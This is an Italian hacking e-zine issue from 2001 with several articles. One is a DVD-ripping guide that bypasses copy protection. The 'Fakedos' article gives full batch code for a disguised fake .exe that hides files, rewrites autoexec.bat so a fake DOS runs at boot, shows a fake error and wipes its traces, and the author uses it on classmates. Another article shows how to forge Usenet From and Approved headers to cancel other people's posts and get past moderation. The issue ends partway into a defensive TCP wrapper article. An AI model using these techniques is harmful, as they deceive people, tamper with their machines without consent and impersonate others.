Copy Link
Add to Bookmark
Report
Dirtynet 005
/
/ D . i . r . t . y . N . e . t /
/n° 5 /
Rivista mensile/bimensile gratis sulla sicurezza
numero "5" mese uscita Luglio 2001
/Tutti i testi sono sottoposti ad adattamento - syn /
/La rivista non segue un regolare andamento per le uscite /
/Inizio Disclaimer /
Tutto il contenuto di questo file di testo è da ritenersi dannoso quindi non applicabile.
L'utente è pregato di non mettere in atto quanto scritto .Esso è solo stato pubblicato
per offrire una conoscenza maggiore in ambito ,NON per altri scopi.Il testo non si puo'
modificare ne tanto meno vendere senza il consenso dell'autore.Se non si rispettano le
norme l'utente avrà commesso azione illegale. In questo testo è solamente presente
INFORMAZIONE, e l'informazione per legge è LEGALE. Leggendo queste righe tu ACCETTI I
TERMINI descritti, se ci fosse qualcosa di contrario alla tua' mente, esci e cancella
questo file.
/Fine Disclaimer /
/ website /
http://www.accaet.da.ru
/email /
syn - syn@hackersat.com
av4Tar_ - avatar@hackersat.com
Jrash - jrash@hackersat.com
Ghent - ghent@hackersat.com
phaet - vesa8_34@yahoo.it
kEwL - kewl@penguinpowered.com
/ascii /
sYn
/staff assemblo /
syn - Av4Tar_
/===========================::=============================::=================/
/ /Indice /Allegati / /
/===========================::=============================::=================/
/800x600 standard full screen /
Indice
Titolo Collaboratore
/Intro /
Intro - Ghent
/Hacking, sicurezza informatica /
Ripping dvds (parte 1) - Norm_the_ripper
Fakedos project (prima parte) - Ghent
Come cancellare un post altrui da un newsgroup - Ghent
Di nuovo TCP wrapper? e si... - True
How to Wingate - SPYRO
Informazioni personali grazie al database del NIC - Ghent
/Hacking satellitare /
Bug 32/34 - syn's Father
/Mezzing /
Motori&Motori - Jrash
L'inseguimento 2 - phaet
/Phreaking /
/Narcoting /
Il secchio - phaet
Il veliero - phaet
/Miscellanea /
Sorgenti di Windows! - Ghent
Comunicato stampa dell'agenzia dei Death SS ! - To syn
/Outro /
Links - syn
Outro - Ghent
/Allegati / - cartella "_attc_"
fakedos1.zip = allegato all'articolo di Ghent
mezzing1.zip = allegato all'articolo di Jrash
segamosc.zip = un art sulla creazione di una MOSCA
sps1.jpg = vecchio cartellone pubblicitario!
sps3.jpg = vecchio cartellone pubblicitario!
usenet1.zip = 2 usenet by Ghent
/===========================::=============================::=================/
/ /Intro / Ghent /
/===========================::=============================::=================/
~ || N T R O ~
Salve gente, come va?
A me decisamente bene, finita la scuola ho finalmente piu' tempo
libero...
tanto che mi sto finalmente dedicando un pochino a Linux, con annesse
bestemmie contro il mio winmodem che non vuole funzionare : )
Estate, tempo di progetti, cambiamenti e si spera di donne...
i progetti sono sempre troppi per essere elencati, mentre per avere un
idea
dei cambiamenti basta vedere il restyling "accaet" (www.accaet.da.ru)
opera
del nostro syn... per le donne... beh, li' la questione si complica,
altro che portscanners, kernel da aggiornare, moduli binari che non
funzionano (maledetto winmodem), firewalls ed exploits :)
Basta deliri, e' tempo di ampliare le nostre conoscenze...
...anche grazie al modesto contributo di questo nuovo numero di
Ðirty/\/et.
Buona lettura,
| H@ Team \ Ghent / ghent@hackersat.com |
***
/===========================::=============================::=================/
/ /Ripping dvds (parte 1) / Norm_the_ripper /
/===========================::=============================::=================/
INFORMAZIONI LEGALI: Tutte le notizie presenti in questa guida sono pensate
e scritte per puro scopo informativo. I seguenti procedimenti non vanno
applicati a materiale coperto da copyright se non si e' autorizzati in quanto
si pptrebbero infrangere le leggi internazionali sui diritti d'autore.
L'autore non si ritiene responsabile per eventuali danni causati dalla
cattiva messa in atto del contenuto di questo testo.
RIPPARE I FILM IN DVD SU NORMALI CDROM (parte 1: livello base)
Se il vostro sogno e' di avere una videoteca personale in cdrom, ma non
avete 7 milioni da spendere per un masterizzatore di dvd, ebbene avete
aperto l'ezine giusta ;-) .
In questo articolo, infatti, cercheremo di capire come ottenere un filmato
avi di circa 700 mega partendo da un normale (e molto piu' capiente) dvd.
Cominciamo con un po' di teoria: un film memorizzato in un dvd non e' altro
che un insieme di tracce mpeg2 (una per il video e altre per le varie lingue
audio) molto simili a quelle trasmesse via satellite dalle emittenti in
digitale (come D+ o Stream). Le suddette tracce sono criptate e divise in
quattro o piu' file VOB da un gigabyte ciascuno e possono essere decriptate
soltanto dai lettori o da specifici programmi (come il powerdvd o il windvd, di
solito forniti con le unita' dvd-rom). Quindi in teoria un film in dvd puo'
essere visto solo dal disco originale, perche' se copiato sull'hd diventa indecifrabile.
Fortunatamente esiste gente di un certo livello che ha compilato programmi in
grado di estrarre i file sul disco fisso lasciandoli in forma normale e leggibile.
Quindi disponendo di uno di questi programmini e di 20 minuti di tempo si puo'
avere una perfetta copia sul nostro disco, che occupa in media 5 o 6 giga. Ma noi
non vogliamo sprecare cosi' i nostri megabytes, vero? E' lo stesso discorso che vale
per gli mp3, chi e' il niubbone che si tiene le tracce audio salvate sull'harddisk
in formato wav?
Ora qualcuno dira': "Ma il dvd non e' gia' compresso in mpeg2? Come facciamo a
comprimerlo ulteriormente?". In realta' il dvd e' compresso minimamente, con un
bitrate altissimo per garantire una qualita' superba ed un audio in dolby surround,
ma noi poveri mortali che siamo abituati alle disturbatissime tramissioni in mono
via etere possiamo sacrificare un po' di qualita' per la praticita' (e soprattutto
per il costo :) . Ecco che fa la sua comparsa il codec DIVX: un hack dell' algoritmo
di codifica mpeg-4, che con un bitrate molto basso ci garantisce una qualita' molto
vicina all'originale. Il risultato finale che vogliamo ottenere e' un file in formato
avi compresso che sara' visibile a chiunque abbia il codec installato.
In pratica, per rippare il nostro buon dvd abbiamo bisogno dei seguenti programmi:
DOD dvd speed ripper v1.1 o successive (per decriptare il dvd e trasferirlo sull'hd)
Il codec divx versione 3.11 o successive (l'algoritmo di codifica)
FlaskMPEG v0.59 (per convertire tutti i file vob in un unico file compresso col divx)
VirtualDub v1.4 o successive (per comprimere ulteriormente il file ottenuto e per
dividerlo se necessario)
Potete trovare tutti questi simpatici programmini facilmente all'indirizzo http://dvd.box.sk
Inoltre vi servono, in ordine di importanza: Un lettore dvd, un dvd, un harddisk
molto capiente (per l'intero processo servono almeno 8 giga liberi), un processore
almeno 400 mhz (se non volete codificare per giorni), tanta pazienza (indispensabile)
e un masterizzatore (opzionale).
Se vi siete procurati tutto il materiale, possiamo cominciare:
1) Inserite il dvd nel lettore ed avviate DOD SPEED RIPPER. Selezionate tutti i file e
salvateli in una cartella (Il processo richiede circa 20 minuti). DOD prevede due
modalita' di salvataggio: in un singolo file o in una cartella. Noi abbiamo bisogno dei
file vob separati, quindi optate per la seconda (dovete avere una cartella gia' creata ed
indicarla). Se lo spazio e' il vostro problema, potete anche fare una estrazione selettiva
dei files. Infatti molti dvd contengono materiale aggiuntivo, quindi potete estrarre solo
il film selezionando il primo file .ifo e i successivi file vob che hanno lo stesso nome (di
solito sono di un giga ciascuno tranne l'ultimo, che e' leggermente piu' piccolo).
2) Installate il codec divx (questo non necessita di ulteriori spiegazioni). Tendete a
prendere la versione 3.2 (o successive) perche' e' molto piu' veloce delle precedenti.
3) Avviate FlaskMPEG (accertatevi di aver preso la versione 0.59, perche' nelle
versioni successive l'opzione dvd e' scomparsa). Selezionate l'opzione "Open dvd
file" dal menu' "file".
Sceglielte il file ifo dalla cartella dei file estratti, dopodiche' scegliete la
traccia video che dura quanto il film (ovviamente) e la lingua che preferite. Non
scegliete alcun sottotitolo (altrimenti avreste un filmato con i sottotitoli non
deselezionabili).
4) E' il momento di configurare il file in uscita. Dal menu' opzioni selezionate "Opzioni
file in uscita" e scegliete i codec video e audio. Come video il "DIVX mpeg4 video codec",
clickate su "configura" e settate il keyframe ogni 10 secondi, il controllo di
compressione a 100 (crispness), il data rate a seconda della durata del film (se
dura 1h e 30 settate a 900, 2h a 750). Come audio scegliete PCM, 44.100 khz, 16 bit, stereo.
5) Ora andate nel menu' "settaggio film", scegliete la risoluzione 640x352 se il
film e' in 16:9, 640x480 se e' in 4:3. E' consigliabile lasciare i fotogrammi al
secondo a 25. Poi passate alla scheda "Audio" e scegliete di decodificare l'audio
a 44.100. Nella scheda "post trattamento" selezionate il filtraggio bicubico HQ,
scegliete di non ritagliare, non riquadrare e di non mantenere il rapporto
altezza/larghezza. Indicate poi la cartella dove salvare il file e se spegnere il
computer a lavoro finito (utile se lasciate il pc a lavorare di notte, dato che il
processo richiede circa 7 ore). Potete avere un preview del formato dando un'occhiata
al "Pannello in uscita".
6) Siamo pronti ad iniziare la conversione... non usate troppo il computer durante il
lavoro perche' se dovesse bloccarsi sareste costretti a ricominciare il lungo processo.
7) Se tutto e' andato bene dovreste avere un file di oltre un giga. Potete gia'
vederlo, se e' in ordine procedete con la compressione dell'audio, aprite il file
con VirtualDUB. Nel menu' video scegliete "direct stream copy", mentre in quello
audio scegliete "Full processing mode", un interlaving di 500 ms e come compressione
scegliete il codec "Divx WMA audio v2" a "64kbps, 44khz, stereo for video".
Salvate il file con un nuovo nome ed in 5 minuti avete risultato finale.
8) Scrivetelo su cd e ricordatevi di includere il codec divx, indispensabile per
la visione. Il file e' leggibile dal windows media player.
Se il file ottenuto dopo tutte le compressioni e' superiore a 700 mb, e'
consigliabile abbassare il data rate nella compressione iniziale, ripetendo tutto
il processo, o alzarlo fino a 1100 e dividere il file in due con il virtualdub.
Oppure se proprio siete fannulloni dividere il file in due senza rifare tutto ;) .
Ma solitamente un film di 1 ora e 50 minuti va egregiamente su un cd con qualita' molto buona.
Se poi volete la perfezione... aspettate di leggere il seguito di questa guida... :)
Norm_the_ripper
/===========================::=============================::=================/
/ /Fakedos project (prima parte) / Ghent /
/===========================::=============================::=================/
___ FAKEDOS PROJECT ___
^^^^^^prima parte^^^^^^
Cosa si fa secondo voi in un lab di informatica quando si finisce prima
del previsto una serie di esercizi Pascal assegnati?
Beh, semplice: se il pc in uso è collegato in LAN si fa qualche bonario
scherzetto ai compagni, rischiando il massacro (ghghg, non dimentichero' mai
quando ho fatto un taglia/incolla da remoto di tutti i sorgenti pascal sul
floppy di due miei compagni... ehehe, che facce quando dopo un quarto d'ora se
ne sono accorti e io gli ho miracolosamente portati i files ^__________^), se
invece niente LAN, beh, cazzeggiamo un po' col Pascal, gia' che ci siamo...
cosi' è iniziata la creazione del Fakedos.
Conosco il Pascal solo per quello che ho fatto a scuola, quindi sicuramente il prog.
si potrebbe organizzare meglio sfruttando piu' a fondo il linguaggio... intanto,
ci si arrangia :)
In questa prima parte, proprio perche' il programma vero e proprio è ancora in
sviluppo, niente sorgente dell'exe ma analisi della procedura che ho escogitato
per mettere all'avvio il FakeDos.
Per ora funziona solo con dos e Win95/98, con WinME niente da fare poiche' la
procedura di boot è stata del tutto cambiata. Se avro' tempo cerchero' di mettere
il fakedos in esecuzione all'avvio sotto WinMe sfruttando il registro, ed in
particolare le chiavi Run/RunOnce ecc. ... dovrebbe bastare un .reg ben preparato.
Inoltre se riesco a fare una cosa che mi frulla in testa potro' inglobare tutti i files
in uno solo exe, che eseguito creera' direttamente i file necessari in C: al posto di
copiarli...
cmq, iniziamo cosi'... il batch scripting del DOS puo' sempre tornare utile (io ad
esempio ho fatto una procedura di backup di mails, database di ICQ, database delle
News e altri file importanti con un un bat relativamente complicato. La uso spesso,
ed è semplice ed efficace)
Ok, ora si inizia.
---
Il "FakeDOS pack" è formato da 4 files:
fakedos.exe (il programma vero e proprio)
autoexec.fak (uno spezzone di codice che andra' automaticamente inserito
nell'auotoexec.bat)
ripristi.bat (un bat che mette tutto a posto nel sistema dopo l'uscita dal prog.)
regcassa.exe_^spazispazispazispazi^_.bat
(un altro bat mascherato da exe, lo so che è una cazzata ma vi assicuro che
in un lab delle superiori ci cascano tutti :))
vediamo di capire come funziona il tutto...
prima di tutto i files del pack sono settati +h, ovvero nascosti... tutti tranne il
falso exe regcassa.exe.bat (lo potete chiamare come volete, si trova cosi' perche'
quando l'ho preparato e l'ho fatto eseguire era stato assegnato un esercizio che
diceva di simulare con un prog. un registratore di cassa.)
E allora, cosa fa questo batch una volta lanciato?
Vediamo il codice...
***regcassa.exe...spazi....bat***
@echo off
attrib *.* -h
copy c:\autoexec.bat c:\autoexec.bkp >nul
attrib c:\autoexec.bkp +h
copy fakedos.exe c:\fakedos.exe >nul
attrib C:\fakedos.exe +h
copy ripristi.bat c:\ripristi.bat >nul
attrib C:\ripristi.bat +h
copy autoexec.fak c:\autoexec.fak > nul
type c:\autoexec.bat >> C:\autoexec.fak
copy c:\autoexec.fak c:\autoexec.bat >nul
del c:\autoexec.fak >nul
attrib *.* +h
echo Errore di runtime 108
***
Cosa fa questo batch? Allora, andiamo riga per riga:
________
@echo off
disabilita l'eco dei comandi a video, in modo che non appaiano
attrib *.* -h
setta gli altri tre files -h, (non nascosti) per poterli copiare
copy c:\autoexec.bat c:\autoexec.bkp >nul
fa una copia di backup dell'autoexec.bat presente nel sistemaal momento dell'esecuzione
"> nul" serve, per chi non lo sapesse, a settare un output virtuale per il comando...
in pratica fa in modo che gli output tipo "1 file copiato" non vengano visualizzati a
video (il video è in effetti l'output predefinito)
attrib c:\autoexec.bkp +h
setta come nascosta la copia dell'autoexec appena eseguita
copy fakedos.exe c:\fakedos.exe >nul
copia il fakedos nella root
attrib C:\fakedos.exe +h
nasconde il fakedos
copy ripristi.bat c:\ripristi.bat >nul
copia il batch di ripristino nella root
attrib C:\ripristi.bat +h
lo nasconde
copy autoexec.fak c:\autoexec.fak > nul
copia il frammento di autoexec nella root
type c:\autoexec.bat >> C:\autoexec.fak
mette il contenuto dell'autoexec in coda alle righe presenti in autoexec.fak
Il doppio maggiore (">>") è utilissimo, come anche il maggiore. In pratica inviano
l'uscita del comando non a video ma ad un altro output che andiamo a definire. E' come
per ">nul", solo che ora la destinazione non è il "buco nero" nul, ma un file
(auotoexec.fak).
">" sostituisce, ">>" mette in coda (append).
copy c:\autoexec.fak c:\autoexec.bat >nul
sostituisce l'autoexec.fak appena preparata all'autoexec.bat
del c:\autoexec.fak >nul
cancella l'ormai inutile autoexec.fak
attrib *.* +h
setta nuovamente come nascosti i 3 files del pack, come all'origine
echo Errore di runtime 108
grazie al comando "echo" mostra un falso messaggio d'errore del Pascal...potete
sostituirlo con cio' che volete: questa è l'unica riga che verra' visualizzata a video
lanciando il falso exe. In pratica io sono andato tutto allegro dal bersaglio di turno
dello scherzo, ed ho fatto: "Ehi, guarda che programma da
paura che ho fatto!" - al che,
sperando di scopiazzare qualche idea, il tizio ha eseguito all'istante il falso exe
che gli ha dato "Errore di runtime 108".
"AHAHA, errore, e questo sarebbe il gran programma?"
"ahr ahr ahr, riavvia e poi ne riparliamo" :))))
______
Ora andiamo a vedere in pratica, passo passo, cosa accade eseguendo il file precedentemente
descritto.
I files vengono copiati e nascosti, l'autoexec viene backuppata... ma il cuore del
tutto è l'inserimento delle righe di autoexec.fak prima di quelle dell'autoexec normale.
Questo è il contenuto di autoexec.fak:
***autoexec.fak***
@echo off
attrib c:\fakedos.exe -h
fakedos.exe
attrib c:\ripristi.bat -h
ripristi.bat
@echo on
***
Commentiamolo riga per riga come abbiamo fatto col primo file...
_________
@echo off
disabilita l'eco a video
attrib c:\fakedos.exe -h
leva l'attributo hidden, nascosto, a fakedos.exe
fakedos.exe
lo esegue: questo è il passo chiave.
attrib c:\ripristi.bat -h
setta anche ripristi.bat non-nascosto
ripristi.bat
lo esegue, cancellando le tracce.
@echo on
riporta l'eco a video a on
_________
Quindi, ipotizziamo di avere prima dell'esecuzione del falso exe una autoexec.bat
cosi' strutturata:
***autoexec.bat***
SET BLASTER=A220 I7 D1 H7 P330 T6
SET SBPCI=C:\SBPCI
mode con codepage prepare=((850) C:\WINDOWS\COMMAND\ega.cpi)
mode con codepage select=850
keyb it,,C:\WINDOWS\COMMAND\keyboard.sys
***
Ok, quindi quando l'esecuzione di regcassa.exe.__spazi__.bat arriva a
type c:\autoexec.bat >> C:\autoexec.fak
il contenuto dell'autoexec.bat viene accodato a quello di autoexec.fak, ottenendo
***autoexec.fak***
@echo off
attrib c:\fakedos.exe -h
fakedos.exe
attrib c:\ripristi.bat -h
ripristi.bat
@echo on
SET BLASTER=A220 I7 D1 H7 P330 T6
SET SBPCI=C:\SBPCI
mode con codepage prepare=((850) C:\WINDOWS\COMMAND\ega.cpi)
mode con codepage select=850
keyb it,,C:\WINDOWS\COMMAND\keyboard.sys
***
e subito dopo autoexec.fak viene sostituito ad autoexec.bat, nella riga
copy c:\autoexec.fak c:\autoexec.bat >nul
Semplice ed efficace, no?
Al successivo avvio del computer, il boot si fermera' sul prompt del fakedos :))
Vedrete solo
C:\
e non starete usando il DOS ma il programmino Pascal fakedos.exe :)
una volta terminato fakedos (per ora con "quit", in futuro con altri comandi che
sto aggiungendo insieme al mio aiuto umoristico, Norman^B^)
il computer partira' normalmente, ma prima eseguira ripristi.bat... cosa fa ripristi.bat?
Andiamo a vedere.
***ripristi.bat***
@echo off
attrib c:\autoexec.bkp -h
copy c:\autoexec.bkp c:\autoexec.bat > nul
del c:\fakedos.exe > nul
del c:\autoexec.bkp > nul
echo del ripristi.bat > ripristi.bat
***
commento riga per riga...
_____
@echo off
ormai lo sapete, no?
attrib c:\autoexec.bkp -h
il backup dell'autoexec fatto in precenza viene settato -hidden
copy c:\autoexec.bkp c:\autoexec.bat > nul
e viene sostituito all'autoexec taroccata che avevamo messo prima.
del c:\fakedos.exe > nul
il fakedos viene cancellato...
del c:\autoexec.bkp > nul
...il backup dell'autoexec anche, non serve piu'...
echo del ripristi.bat > ripristi.bat
ehehe, qui un tocco di classe... con la tecnica del maggiore spiegata piu' sopra,
lo stesso contenuto di ripristi.bat viene sostituito solo da "del ripristi.bat"
Se qualcuno provasse a vedere cos'è questo file, ripristi.bat (deve rimanere per forza
qualcosa, non si puo' autocancellare), non troverebbe tracce della procedura di
sostituzione dell'autoexec ne' della cancellazione dei files del fakedos.
Su alcuni sistemi, inoltre (ad esempio dal win98 dal quale sto scrivendo funziona),
eseguendo il file questo si autocancella :)
Fine della prima parte, presto il sorgente e possibilmente un modo migliore per
installare di nascosto il prog ;)
bye,
#Ghent#
/===========================::=============================::=================/
/ /Come cancellare un post altrui da un newsgroup / Ghent /
/===========================::=============================::=================/
_-_-_-_-_ Come cancellare un post altrui da un newsgroup _-_-_-_-_
Ciao, miei numerosi lettori (quanti siete diventati, ormai?? 6? 7? :) )
Ultimamente sto giocherellando con telnet ed i protocolli SMTP/POP/NTTP...
si possono fare parecchie belle cose, come avrete avuto modo di verificare
anche con gli articoli sulle fakemail dei precedenti numeri di DN, eh? ;)
Cerchero' di essere originale spiegandovi come funziona la cancellazione
dei post dai server delle news... puo' tornare utile in svariati casi, ad
esempio contro spammer merdosi (abbinata ad una letterina ai rispettivi
abuse, naturalmente ;) ) o contro invasioni di troll/flamers.
Raccomandazione standard: se vi dovessi sgamare a cancellare messaggi senza
un ottimo motivo, ledendo solo la liberta' di parola di chi posta, giuro che
cercherei di fare di tutto, nel mio piccolo, per farvene pentire. >:(
Inoltre, ricordate bene che i messaggi di controllo sono visibili su
appositi newsgroup (ad esempio alt.control.cancel) col vostro NNTP Posting
Host bello bello negli headers... quindi, se fate cazzate, state sicuri che
*come minimo* il vostro account -zak- vi sara' segato...
Allora, vediamo un po' di teoria e poi la pratica, ok?
Quando col vostro bel newsreader inviate un messaggio ad un ng, questo compie
una serie di operazioni: si collega al server delle news, se ce n'è bisogno
vi autentica e poi esegue in automatico delle operazioni... mette degli headers
(intestazioni) nel vostro messaggio, essenziali per far capire al server dove
il messaggio deve andare, da chi proviene ecc. ...
Questa parte non ci interessa, per capire bene come funziona lo smistamento
dei post e la loro diffusione, e con quali comandi interagire col server
delle news, vi rimando alle RFC che mi sono studiato io avendo la necessita'
di castigare uno psicopatico cancellandogli (tra l'altro ;) ) i posts.
Si', ora ci arrivo, a 'sta cancellazione, calmi, branco di lameracci! ^___^
Avete notato che i vostri bei newsreader di cui stavamo parlando sopra
hanno un'opzione di cancellazione dei *vostri* messaggi? Si', ad esempio
Outlook Express (bleah) ha "Annulla messaggio" nel menu' messaggio, o
Gravity nel menu' article "Cancel article..."
Vi siete mai chiesti come funziona la cancellazione dei messaggi, e perche'
questi disgraziati di newsreader non vi permettono di cancellare i messaggi
degli altri? ^___^
Beh, io me lo sono chiesto, e all'inizio non mi sono risposto.
(Voi come vi sentite? Male? Avete provato a chiamarvi a voce alta?)
Poi mi sono letto le RFC, e ho capito tutto :))
<spam> queste battute, invece, provengono da overdose di Rat-Man, leggetelo
ragazzi, fidatevi... da scompisciarsi :) </spam>
La cancellazione dei messaggi avviene tramite degli altri messaggi, che pero'
non vengono visualizzati sul ng dove avete postato il messaggio originale:
sono infatti dei Control messages, dei messaggi di controllo che comandano al
server determinate operazioni.
L'operazione che interessa a noi è appunto il "cancel", l'annullazione.
Quindi, non bisogna fare altro che preparare un messaggio di cancel che possa
funzionare col nostro bersaglio... per farlo abbiamo bisogno di qualche
informazione, che possiamo ricavare dagli headers del messaggio.
Procediamo con un esempio, cosi' si semplifica tutto :)
Ipotizziamo di voler cancellare il messaggio dello spammer di turno...
***
Oggetto: Windows95 a prezzi stracciati!
Da: "Spammerdoso"
Newsgroup: it.comp.sicurezza.varie
Contattaci, vendiamo licenze del vecchio ma sempre stabile, efficace e
versatile sistema Microsoft.
Con un piccolo extra anche il cd originale oltre alla licenza, ottimo
se oltre agli schermi blu amate anche giocare a freesbee.
***
Questo è quello che normalmente mostrano i newsreader: oggetto, mittente e
corpo del messaggio.
Visto che non sono informazioni sufficienti, come ho scritto sopra, diamo
un'occhiata agli headers del messaggio.
Con Outlook Express, si fa selezionando il messaggio, cliccandolo col destro
e visualizzando le "proprieta' del messaggio", "messaggio originale".
Con Gravity, basta premere "h" ;)
Vediamo come potrebbe apparire il messaggio completo...
***
Path: uni-berlin.de!fu-berlin.de!nntp.infostrada.it!news.infostrada.it!not-for-mail
From: "Spammerdoso" <spammer@iol.it>
Newsgroups: it.comp.sicurezza.varie
Subject: Windows95 a prezzi stracciati!
Message-ID: <XGs.c52066e9f16a2151984g20@news.libero.it>
X-Newsreader: MicroPlanet Gravity v2.50
Lines: 5
Date: Mon, 10 May 2001 09:24:34 +0200
NNTP-Posting-Host: 151.15.233.135
X-Complaints-To: abuse@iol.it
X-Trace: news.infostrada.it 989227474 151.15.233.135 (Mon, 07 May 2001 11:24:34 MET DST)
NNTP-Posting-Date: Mon, 07 May 2001 11:24:34 MET DST
Organization: [Infostrada]
Xref: uni-berlin.de it.fan.tv:15751
Contattaci, vendiamo licenze del vecchio ma sempre stabile, efficace e
versatile sistema Microsoft.
Con un piccolo extra anche il cd originale oltre alla licenza, ottimo
se oltre agli schermi blu amate anche giocare a freesbee.
***
Vi avverto che sono headers un po' alla cacchio, in parte li ho modificati,
in parte inventati. Cmq per il nostro esempio vanno benissimo.
Quali sono le info che ci servono?
Essenzialmente, 2: il "From" ed il "Message-ID", nel nostro caso insomma
From: "Spammerdoso" <spammer@iol.it>
Message-ID: <XGs.c52066e9f16a2151984g20@news.libero.it>
Altre informazioni interessanti, se non lo sapeste, possono essere
NNTP-Posting-Host: 151.15.233.135
è l'ip del tizio, nel momento nel quale ha postato il messaggio. <eg> :)
X-Complaints-To: abuse@iol.it
è l'indirizzo del suo abuse. Se il tizio spamma o altro, qualche
segnalazione all'abuse e prima lo avvertiranno e poi gli leveranno
l'account.
X-Newsreader: MicroPlanet Gravity v2.50
è il suo newsreader. Puo' essere un'informazione eccezionale, basti
pensare ai buchi terribili come quello del buffer overflow del subject,
di Outlook Express 5...
Ok, non divaghiamo, iniziamo a formare il nostro messaggio di cancel
(per non sbagliare spazi o cose del genere vi conviene sempre copiare gli
headers dal messaggio da cancellare... uno spazio di piu' nel From, ad
esempio, e credo proprio che il messaggio di cancel non funzionera'):
From: "Spammerdoso" <spammer@iol.it>
cosi' per il server il mittente del messaggio di cancel sara' l'autore del
messaggio originale, quello da cancellare.
Aggiungiamo poi l'header "Date", che potrebbe sembrare inutile ai nostri
fini ma è uno degli headers obbligatori del protocollo NNTP... per non
sbagliare con le abbreviazioni dei giorni in inglese
(Mon, Tue, Wed, Thu, Fri, Sat, Sun) con data, ora e fuso orario, vi
conviene rifarvi a quella del post da cancellare, o di un altro piu' recente...
non si puo' postare con una data futura, e suppongo che neanche una
precedente a quella del messaggio originale funzionera' (uno manda prima
il messaggio di annullamento e poi quello da annullare?).
Date: Mon, 11 May 2001 23:24:34 +0200
Cosa manca? Ovviamente il newsgroup destinatario...
Newsgroups: it.comp.sicurezza.varie
....il subject, che scriviamo in modo particolare:
Subject: cmsg cancel <XGs.c52066e9f16a2151984g20@news.libero.it>
cmsg sta per "control message", cancel è il comando e poi segue il
Message-ID del messaggio da cancellare. Semplice, no?
Potrebbe bastare, ma per sicurezza conviene aggiungere altri due
headers: Control, Approved.
Control: cancel <XGs.c52066e9f16a2151984g20@news.libero.it>
Stesso ragionamento di prima... per Approved invece ammetto di non essere
tanto sicuro sul funzionamento: nella RFC c'è scritto che è necessario
per alcuni messaggi di controllo... conviene mettere l'indirizzo di
amministratori delle news del dominio del tizio autore del post da
cancellare. E' un'idea prendere l'indirizzo dell'abuse del mittente, a
me ha funzionato: sempre riferendoci al nostro messaggio di esempio,
X-Complaints-To: abuse@iol.it e di conseguenza
Approved: abuse@iol.it
Ah, sapete una bella cosa? Approved è l'header che viene usato per la
moderazione dei newsgroups... quindi in teoria basta aggiungerlo con
l'indirizzo del moderatore (basta sbirciare l'approved di un messaggio
che appare sul ng passata la moderazione) e si potra' postare tranquillamente
su un newsgroup moderato. Non ho provato ancora, ma 99 su 100 deve funzionare,
se lo dice la RFC :)
Non sentite come una strana sensazione di potere? Io si', bwahahahahaha :)
(occhio all'uso che ne fate, pero'... dice la legge di Murphy sull'hacking:
"c'è sempre qualcuno piu' esperto di te che puo' spezzarti le braccine virtuali,
se fai il lameraccio". Bella, eh? L'ho appena inventata...devo scriverne altre :)
Ricapitolando, ecco il nostro messaggio di cancel:
****
From: "Spammerdoso" <spammer@iol.it>
Date: Mon, 11 May 2001 23:24:34 +0200
Newsgroups: it.comp.sicurezza.varie
Subject: cmsg cancel <XGs.c52066e9f16a2151984g20@news.libero.it>
Control: cancel <XGs.c52066e9f16a2151984g20@news.libero.it>
Approved: abuse@iol.it
****
Ora, diranno i niubbi piu' niubbi di me: e come faccio a inserire questi headers?
Quelli meno niubbi di me diranno "semplice, 'sto Ghent se non è una mezza cicca
avra' allegato il sorgente di un programmino che posti il messaggio, no?"
"No", diro' io, perche' non sono capace :)
Prima o poi lo faccio pero'... intanto, c'è il caro vecchio telnet:
occhio a come digitate, se non volete ripetere tutte le operazioni dall'inizio a
ogni errore di battitura... vi consiglio di prepararvi il messaggio in un file di
testo e poi copiarlo con attenzione...
lanciate il vostro terminale telnet:
(con Windows: start > Esegui > telnet news.tiscalinet.it 119, e ricordatevi di
attivare l'echo locale da "terminale>preferenze", senno' non ci capirete un ca%%0 - )
119 è la porta delle news, news.tiscalinet.it è il server news della tiscali
....sostituite col vostro server, naturalmente.
date il comando NNTP per postare un messaggio, "post" poi scrivete tutti gli
headers che avrete preparato prima con calma... seguiti da una linea vuota
(o erano due? Una serve per determinare l'inizio del "body" del messaggio,
ma poi ci vuole un'altra linea vuota, o no? dubbio atroce... provate :)
- cmq una linea vuota in piu' non dovrebbe far nulla, in questo caso... terminate con
"." e invio. In definitiva:
***
post
From: "Spammerdoso" <spammer@iol.it>
Date: Mon, 11 May 2001 23:24:34 +0200
Newsgroups: it.comp.sicurezza.varie
Subject: cmsg cancel <XGs.c52066e9f16a2151984g20@news.libero.it>
Control: cancel <XGs.c52066e9f16a2151984g20@news.libero.it>
Approved: abuse@iol.it
.
***
Dovreste ricevere dal server dei messaggi di ok, e infine di "post inviato".
Il server cancellera' il post e forwardera' il messaggio di controllo con altri
server, come accade con tutti i messaggi... tutti i server che permettono il cancel
elimineranno il messaggio.
Ovviamente il messaggio non sara' cancellato dal database dei newsreader, se
è gia' stato scaricato, ma dal server: potete controllare l'avvenuta cancellazione
ri-scaricando il newsgrouop con un altro server/profilo (se usate Gravity),
un'altra identita'/altro server (se usate OE) o direttamente da telnet...
....come fare con telnet pero' non ve lo dico, cosi' siete tentati di studiare la
RFC :)))
A presto, cerco di studiare un pochino, ora...
....solo che sono tentato di studiare "Flash Actionscript" al posto del libro di
(bleah) storia, che si potrebbe sintetizzare nella frase:
"nel medioevo c'era una marea di coglioni pieni di soldi, fatti alle spese del popolo,
che in mancanza di film di Selen in DivX passava il tempo a fare guerre l'uno contro
l'altro - meglio se a sfondo religioso - per fare ancora piu' soldi."
bye...
un Ghent che si chiede "c'è qualche donna che mi legge su questa e-zine... ?_?"
(ghent@hackersat.com, forza, che cosa aspettate? :) )
/===========================::=============================::=================/
/ /Di nuovo TCP wrapper? e si... / True /
/===========================::=============================::=================/
Di nuovo TCP wrapper? e si...
Una maniera semplice ed efficace per rendere più sicuro il vostro sistema Unix
Tutti i computer collegati ad Internet sono ben lontani dall'essere sistemi sicuri.
Adesso ci occuperemo di un po' di difesa di un sistema Unix.
Infatti lasciare il vostro sistema completamente sguarnito può rivelarsi
davvero catastroficopeggio.
Col passar del tempo ho scoperto delle novità a me "nuove" (altrimenti non erano novita'!).
Un esempio? Sapete che in certi sistemi dando il comando telnet localhost
systat mi veniva fuori la lista dei processi??? E con telnet localhost netstat tira
fuori lo stato della rete, compresa una lista delle connessioni attive??? E questo
senza dover dare username e password!!
Se voglio un sistema sicuro ho due strade: una è disattivare tutti i servizi
pericolosi, ma.....vogliamo veramente fare a meno del telnet, per esempio ? No ? Beh,
allora non ci resta che la seconda strada: il TCP Wrapper,detto anche tcpd.
L'idea alla base è semplice: quando arriva una richiesta per un
servizio (telnet, ftp, finger, etc.) non la soddisfiamo subito, ma andiamo a guardarci
